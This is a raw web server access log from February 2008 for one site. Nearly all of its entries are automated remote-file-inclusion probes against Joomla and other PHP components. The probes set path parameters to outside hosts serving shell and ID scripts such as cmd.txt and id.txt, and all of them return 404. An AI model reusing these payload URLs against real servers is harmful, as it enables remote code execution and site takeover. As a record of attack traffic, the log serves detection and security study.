80.78.228.150 - - [17/Feb/2008:09:46:14 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:09:46:15 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:09:46:15 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:09:46:16 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:09:46:16 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:09:46:16 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.143.84.82 - - [17/Feb/2008:09:46:34 -0800] "GET /redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://menlowstation.net/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.199.215.57 - - [17/Feb/2008:09:46:44 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=www.hotoilstocks.com/components/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.182.65.193 - - [17/Feb/2008:09:46:45 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=www.hotoilstocks.com/components/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.199.215.57 - - [17/Feb/2008:09:46:45 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=www.hotoilstocks.com/components/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.26.28 - - [17/Feb/2008:09:46:48 -0800] "GET /minamijewelry/source_images/?N=D HTTP/1.0" 200 2398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.72.144.18 - - [17/Feb/2008:09:46:53 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.183 - - [17/Feb/2008:09:47:09 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:09:47:18 -0800] "GET /home.php?admin.php?include_path=http://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:09:47:18 -0800] "GET /logs/home.php?admin.php?include_path=http://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
72.55.164.183 - - [17/Feb/2008:09:47:34 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.222.135 - - [17/Feb/2008:09:47:55 -0800] "GET /logs/access_080131.log//main.php?sayfa=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [17/Feb/2008:09:47:55 -0800] "GET //main.php?sayfa=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [17/Feb/2008:09:47:55 -0800] "GET /logs//main.php?sayfa=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.164.183 - - [17/Feb/2008:09:48:54 -0800] "GET /logs/access_080129.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.183 - - [17/Feb/2008:09:48:54 -0800] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.184.165.34 - - [17/Feb/2008:09:49:07 -0800] "GET /index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.184.165.34 - - [17/Feb/2008:09:50:14 -0800] "GET /logs/access_080131.log/index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.184.165.34 - - [17/Feb/2008:09:50:14 -0800] "GET /logs/index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:09:50:27 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:09:50:28 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
90.185.233.233 - - [17/Feb/2008:09:50:39 -0800] "GET //playlist.php/db.php?commonpath=http://rollarefamale.altervista.org/clod??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
90.185.233.233 - - [17/Feb/2008:09:50:39 -0800] "GET /logs//playlist.php/db.php?commonpath=http://rollarefamale.altervista.org/clod??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:09:50:40 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
72.55.164.183 - - [17/Feb/2008:09:51:43 -0800] "GET /logs/access_080130.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.79.205.102 - - [17/Feb/2008:09:52:11 -0800] "GET /logs/access_071220.log HTTP/1.1" 200 140699 "-" "pjgmyrirjwt ht5d wjyypj" "www.dmulk.com"
67.212.164.34 - - [17/Feb/2008:09:52:13 -0800] "GET /logs/access_080121.log//modules/My_eGallery/index.php?basepath=http://usuarios.lycos.es/baixaki/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [17/Feb/2008:09:52:13 -0800] "GET //modules/My_eGallery/index.php?basepath=http://usuarios.lycos.es/baixaki/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [17/Feb/2008:09:52:13 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://usuarios.lycos.es/baixaki/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.24.226 - - [17/Feb/2008:09:52:53 -0800] "GET /logs/access_080131.log//main.php?sayfa=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.24.226 - - [17/Feb/2008:09:52:54 -0800] "GET /logs//main.php?sayfa=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:09:53:05 -0800] "GET /logs/menu.php?admin.php?include_path=http://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:09:53:05 -0800] "GET /menu.php?admin.php?include_path=http://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
69.72.144.18 - - [17/Feb/2008:09:53:59 -0800] "GET /logs/access_071225.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.144.18 - - [17/Feb/2008:09:54:00 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.144.18 - - [17/Feb/2008:09:54:00 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.183 - - [17/Feb/2008:09:54:19 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.183 - - [17/Feb/2008:09:54:20 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.7.68 - - [17/Feb/2008:09:54:53 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
211.233.7.68 - - [17/Feb/2008:09:54:53 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
72.55.164.183 - - [17/Feb/2008:09:57:34 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.81.28 - - [17/Feb/2008:09:58:27 -0800] "GET /logs/access_080131.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [17/Feb/2008:09:58:27 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [17/Feb/2008:09:58:28 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:09:59:21 -0800] "GET /logs/file.php?admin.php?include_path=http://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:09:59:21 -0800] "GET /file.php?admin.php?include_path=http://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
209.59.155.2 - - [17/Feb/2008:09:59:45 -0800] "GET /logs/access_071225.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/dkyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.115.110.146 - - [17/Feb/2008:09:59:50 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
211.115.110.146 - - [17/Feb/2008:09:59:50 -0800] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
211.255.32.189 - - [17/Feb/2008:10:01:35 -0800] "GET /logs/access_080117.log/[Scripthttp://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [17/Feb/2008:10:01:35 -0800] "GET /[Scripthttp://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [17/Feb/2008:10:01:36 -0800] "GET /logs/[Scripthttp://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.81.28 - - [17/Feb/2008:10:02:04 -0800] "GET /logs/access_080121.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [17/Feb/2008:10:02:04 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [17/Feb/2008:10:02:04 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [17/Feb/2008:10:02:51 -0800] "GET /logs/access_080131.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:03:37 -0800] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:03:37 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:03:37 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.24.226 - - [17/Feb/2008:10:04:14 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:10:05:04 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:10:05:04 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.13.222.135 - - [17/Feb/2008:10:05:11 -0800] "GET /logs/access_080117.log/[Scripthttp://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [17/Feb/2008:10:05:11 -0800] "GET /[Scripthttp://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [17/Feb/2008:10:05:11 -0800] "GET /logs/[Scripthttp://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.81.28 - - [17/Feb/2008:10:05:15 -0800] "GET /logs/access_080131.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [17/Feb/2008:10:05:15 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [17/Feb/2008:10:05:15 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.178.81 - - [17/Feb/2008:10:06:24 -0800] "GET /logs/access_071225.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.81 - - [17/Feb/2008:10:06:25 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.81 - - [17/Feb/2008:10:06:25 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:07:08 -0800] "GET /logs/access_080122.log/modules/Neos_Chronos/header.php?base_folder=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:07:08 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:07:09 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:07:56 -0800] "GET /logs/access_080122.log/modules/Neos_Chronos/header.php?base_folder=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:07:58 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:07:58 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.24.226 - - [17/Feb/2008:10:08:07 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:09:34 -0800] "GET /logs/access_080103.log/modules/Neos_Chronos/header.php?base_folder=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.164.34 - - [17/Feb/2008:10:09:54 -0800] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://usuarios.lycos.es/baixaki/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.255.32.189 - - [17/Feb/2008:10:09:56 -0800] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [17/Feb/2008:10:09:57 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [17/Feb/2008:10:09:57 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:10:00 -0800] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:10:01 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:10:01 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:10:07 -0800] "GET /logs/access_080103.log/modules/Neos_Chronos/header.php?base_folder=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.159.204.29 - - [17/Feb/2008:10:10:58 -0800] "GET /logs/access_080118.log/index.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.159.204.29 - - [17/Feb/2008:10:10:59 -0800] "GET /index.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.104.248.62 - - [17/Feb/2008:10:11:03 -0800] "GET /config.inc.php?path_escape=http://www.loveingod.org/bbs/icon/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.159.204.29 - - [17/Feb/2008:10:11:04 -0800] "GET /logs/index.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:10:11:28 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:10:11:29 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
211.115.110.146 - - [17/Feb/2008:10:11:46 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
211.115.110.146 - - [17/Feb/2008:10:11:46 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
208.80.72.89 - - [17/Feb/2008:10:11:57 -0800] "GET /logs/access_071225.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:12:18 -0800] "GET /logs/access_080117.log/login.php?dir=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:12:18 -0800] "GET /login.php?dir=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:12:19 -0800] "GET /logs/login.php?dir=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.238.34 - - [17/Feb/2008:10:12:22 -0800] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [17/Feb/2008:10:12:22 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [17/Feb/2008:10:12:22 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:10:13:35 -0800] "GET /config.php?admin.php?include_path=http://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:10:13:35 -0800] "GET /logs/config.php?admin.php?include_path=http://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
74.6.22.139 - - [17/Feb/2008:10:14:02 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.139 - - [17/Feb/2008:10:14:02 -0800] "GET /bikes/?S=A HTTP/1.0" 200 2168 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.238.34 - - [17/Feb/2008:10:16:27 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.222.135 - - [17/Feb/2008:10:17:17 -0800] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [17/Feb/2008:10:17:17 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
